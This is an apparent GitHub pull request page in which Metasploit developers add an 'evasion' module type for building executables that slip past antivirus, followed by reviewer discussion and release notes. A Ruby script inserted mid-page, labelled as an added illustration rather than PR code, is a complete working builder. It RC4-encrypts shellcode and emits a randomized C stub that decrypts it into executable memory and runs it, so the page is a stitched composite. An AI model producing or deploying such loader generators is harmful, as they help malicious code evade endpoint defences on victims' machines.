Add new evasion module type plus a couple of modules #10759

Merged
merged 25 commits into from Oct 7, 2018

Conversation

8 participants
@wchen-r7
Contributor

wchen-r7 commented Oct 6, 2018

A little DerbyCon surprise.

This pull request adds a new module type to Framework, called "evasion". The purpose of the evasion module type is to allow developers to build executables specifically to evade antivirus, and hopefully this creates a better pentesting experience for the users.

The PR also comes with two modules that serve as examples. The first one generates an EXE that utilizes these techniques: shellcode encryption, code randomization, and a little anti-emulation. For more information about the techniques, please check the Framework Wiki. The second module uses a JS.Net script that's embedded in an HTA file, which gets compiled and executed on the target machine.

Here's a demonstration: [demo recording not reproduced]
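As an added illustration of the first two techniques named in the description above (shellcode encryption and code randomization), here is a stand-alone Ruby script that is not code from this PR or from Metasploit: it RC4-encrypts a constructed placeholder byte string under a random key and emits a C stub, with randomized identifiers and a random number of junk statements, that decrypts the bytes at run time before jumping to them. The placeholder bytes (`EXAMPLE_SHELLCODE`), the identifier scheme and the stub layout are assumptions for illustration; the templates and anti-emulation logic of the real modules are not reproduced.

```ruby
require 'securerandom'

# Constructed placeholder "shellcode": seven x86 NOPs and a RET.
# Real payloads come from the framework; this is only for illustration.
EXAMPLE_SHELLCODE = "\x90\x90\x90\x90\x90\x90\x90\xc3".b

# Plain RC4 (KSA + PRGA). Chosen because the C decryptor is tiny; the aim is
# hiding the payload bytes from static signatures, not confidentiality.
def rc4(key, data)
  s = (0..255).to_a
  kb = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + kb[i % kb.length]) & 0xff
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  data.bytes.map do |b|
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    b ^ s[(s[i] + s[j]) & 0xff]
  end.pack('C*')
end

# Random C identifier, letter first so it is always valid.
def rand_ident(len = 10)
  ('a'..'z').to_a.sample + SecureRandom.alphanumeric(len - 1)
end

# Format a byte string as a C initializer list.
def c_bytes(str)
  str.bytes.map { |b| format('0x%02x', b) }.join(', ')
end

# Code randomization: arithmetic on throwaway volatile locals so that two
# builds do not share the same instruction sequence in main().
def junk_statements(count)
  Array.new(count) do
    v = rand_ident
    "  volatile unsigned int #{v} = #{SecureRandom.random_number(1 << 31)}u; #{v} ^= #{v} >> #{rand(1..7)};"
  end.join("\n")
end

# Build the decryptor stub. Returns the key, the ciphertext, the chosen
# identifiers and the C source, which a caller would hand to a compiler.
def build_stub(shellcode, key_len: 16)
  key = SecureRandom.random_bytes(key_len)
  ct = rc4(key, shellcode)
  n = { buf: rand_ident, key: rand_ident, fn: rand_ident, mem: rand_ident, s: rand_ident }
  src = <<~C
    #include <windows.h>
    #include <string.h>

    unsigned char #{n[:buf]}[] = { #{c_bytes(ct)} };
    unsigned char #{n[:key]}[] = { #{c_bytes(key)} };

    /* RC4 decrypt in place; mirrors the Ruby rc4() above. */
    static void #{n[:fn]}(unsigned char *k, int kl, unsigned char *d, int dl) {
      unsigned char #{n[:s]}[256], t; int i, j = 0, x;
      for (i = 0; i < 256; i++) #{n[:s]}[i] = (unsigned char)i;
      for (i = 0; i < 256; i++) { j = (j + #{n[:s]}[i] + k[i % kl]) & 0xff; t = #{n[:s]}[i]; #{n[:s]}[i] = #{n[:s]}[j]; #{n[:s]}[j] = t; }
      for (i = 0, j = 0, x = 0; x < dl; x++) { i = (i + 1) & 0xff; j = (j + #{n[:s]}[i]) & 0xff; t = #{n[:s]}[i]; #{n[:s]}[i] = #{n[:s]}[j]; #{n[:s]}[j] = t; d[x] ^= #{n[:s]}[(#{n[:s]}[i] + #{n[:s]}[j]) & 0xff]; }
    }

    int main(void) {
    #{junk_statements(rand(2..5))}
      #{n[:fn]}(#{n[:key]}, sizeof(#{n[:key]}), #{n[:buf]}, sizeof(#{n[:buf]}));
      void *#{n[:mem]} = VirtualAlloc(NULL, sizeof(#{n[:buf]}), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (#{n[:mem]} == NULL) return 1;
      memcpy(#{n[:mem]}, #{n[:buf]}, sizeof(#{n[:buf]}));
      ((void (*)(void))#{n[:mem]})();
      return 0;
    }
  C
  { key: key, ciphertext: ct, source: src, names: n }
end

# Print one generated stub; every run yields different names, key and junk.
puts build_stub(EXAMPLE_SHELLCODE)[:source] if __FILE__ == $0
```

Because the key lives in the binary next to the ciphertext, this hides the payload only from scanners that do not run the code; that is exactly why the description pairs encryption with anti-emulation, which this example leaves out.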

wchen-r7 added some commits Oct 6, 2018

rhost = mod.datastore['RHOST'] || '50.50.50.50'
# A list of preferred payloads in the best-first order
pref = [


@busterb

busterb Oct 7, 2018

Contributor

It's not clear if we need this for an evasion module, since we're not trying to pair it with an exploit.


@wchen-r7

wchen-r7 Oct 7, 2018

Contributor

Good catch there. Evasion works best with encrypted payloads and I forgot to actually use this method. Should work now. Thanks.


@busterb

Contributor

busterb commented Oct 7, 2018

Nice work @wchen-r7! A comment we got while demoing evasion modules was that it would be nice to be able to enable it on regular payloads, like with 'set evasion windows_defender', and it would use the module to modify the payload, similar to an encoder. Not really a blocker here, but something to think about for later.


@h00die

Contributor

h00die commented Oct 7, 2018

I thought A/V evasion was one of the big reasons to buy msfpro. Am I confusing something?


@bcoles

Contributor

bcoles commented Oct 7, 2018

@h00die quick, merge it before r7 realizes it's public.


@wchen-r7

Contributor

wchen-r7 commented Oct 7, 2018

> I thought A/V evasion was one of the big reasons to buy msfpro. Am I confusing something?

We'd like to improve the experience for all Metasploit users; this includes commercial and framework users.

> A comment we got while demoing evasion modules was that it would be nice to be able to enable it on regular payloads

That could be on the road map. Thanks for the feedback.


@h00die

Contributor

h00die commented Oct 7, 2018

Ninja merge incoming since @bcoles (kind of) approved it!!!

(Kidding. Also, apologies for the insensitive comment. While meant in jest, it was insensitive, especially considering the climate in the States. Sorry to anyone who was offended; it wasn't cool or professional in any way, shape or form.)


@0x27

0x27 commented Oct 7, 2018

Suggestion/Query: could this be leveraged by exploit modules that drop an executable file to disk and then execute it (thinking Command Stager ones) to avoid getting wrecked by AV during exploitation?


@busterb

Contributor

busterb commented Oct 7, 2018

I wanted to give this a bit of time for review, but don't worry, it's not going away. Feel free to provide any constructive feedback, @h00die, and thanks for the interest.

You can see some more info on this in the talk at the Metasploit Town Hall 0x4 at DerbyCon today: https://youtu.be/4JZlhIj002k?t=1202


@wchen-r7

Contributor

wchen-r7 commented Oct 7, 2018

> Suggestion/Query: could this be leveraged by exploit modules that drop an executable file to disk and then execute it (thinking Command Stager ones) to avoid getting wrecked by AV during exploitation?

Yes, it could do that, just not now. As a matter of fact, this has been brought up a couple of times, so it sounds like it's definitely valuable to implement something like that. Thanks for the feedback.


@Green-m

Contributor

Green-m commented Oct 7, 2018

I am glad to see this big surprise!
Since there are many antivirus evasion tools, such as AVET and Veil, we could now integrate these into evasion modules; that's very convenient and could keep them updated for the best performance against antivirus.

I love this PR, and I think I could contribute more new modules.
Thank you very much @wchen-r7!


@Green-m Green-m added the hotness label Oct 7, 2018

@bcoles

Contributor

bcoles commented Oct 7, 2018

+1 for implementing evasion as part of msfvenom / metasploit-payloads so the remainder of the framework benefits.


@busterb

Contributor

busterb commented Oct 7, 2018

I'm going to land this now, so people can start playing with it in master. Thanks for all of the comments!

Thanks @space-r7 and @wchen-r7!


@busterb busterb merged commit c6dddaa into rapid7:master Oct 7, 2018

3 checks passed:

- Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
- Metasploit Automation - Test Execution: Successfully completed all tests.
- continuous-integration/travis-ci/pr: The Travis CI build passed.

busterb added a commit that referenced this pull request Oct 7, 2018

@busterb

Contributor

busterb commented Oct 7, 2018

Release Notes

This adds a new "evasion" module type to Metasploit Framework, allowing developers to build executables specifically to evade antivirus, and two initial evasion modules using different techniques of evasion. The framework allows users to more easily integrate external tools and write their own evasion modules as well.


@ccondon-r7

ccondon-r7 commented Oct 7, 2018

@h00die - The new module type is the culmination of months of research on evasion techniques and results, and a whole bunch of teams across Rapid7 have been engaged and supportive throughout the process. This isn't a rogue move! As Wei noted, the goal here was to improve evasion for all Metasploit users, including Metasploit Pro customers. The engineering output (i.e., the new module type) looks different in Framework because there was so much emphasis on extensibility. As always, we want the Framework community to be able to build on top of and bring their own perspective to the work the Metasploit engineering team does... which I know you know already, so I'll stop talking and let folks get back to experimenting with the new module type!
